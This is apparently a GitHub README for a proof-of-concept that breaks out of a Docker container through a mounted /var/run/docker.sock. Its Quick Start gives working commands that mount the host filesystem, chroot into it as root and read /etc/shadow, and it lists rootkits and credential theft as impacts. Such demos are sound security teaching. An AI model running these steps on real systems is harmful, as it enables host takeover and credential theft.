A proof-of-concept showing how mounting /var/run/docker.sock into a container gives root access to the host.
This project demonstrates a critical Docker misconfiguration. By mounting the Docker Unix socket into a container, the container can communicate with the host Docker daemon, and can effectively escape its sandbox, escalate privileges, and fully control the host.
TL;DR
Mounting /var/run/docker.sock gives the container root-level access to the host.
Project Structure
docker-sock-breakout/
├── Dockerfile
├── docker-compose.yml
└── exploit.sh
How It Works
- A container is started with -v /var/run/docker.sock:/var/run/docker.sock
- Inside the container, Docker CLI is available
- We use Docker inside the container to run another container
- That second container mounts / from the host and runs chroot /host
- Now we're inside the host, as root
Quick Start
1. Build and Run
git clone https://github.com/CyberSquirrel-AI/docker-sock-breakout.git
cd docker-sock-breakout
docker compose up -d
docker exec -it docker-sock-breakout sh
2. Inside the Container
docker ps
docker run -it --rm -v /:/host alpine
3. Inside the Alpine container
chroot /host
hostname
id
ls /root
cat /etc/shadow
Impact
- Full host filesystem access
- Run arbitrary containers as --privileged
- Read sensitive files like /etc/shadow, /root/.ssh/
- Install rootkits or persist on host
- Pivot to other containers, networks, volumes
Mitigation
- Do NOT mount /var/run/docker.sock into untrusted containers
Disclaimer
This project is for educational purposes only. Do not run this on any system you don’t own or have permission to test. You are responsible for your actions.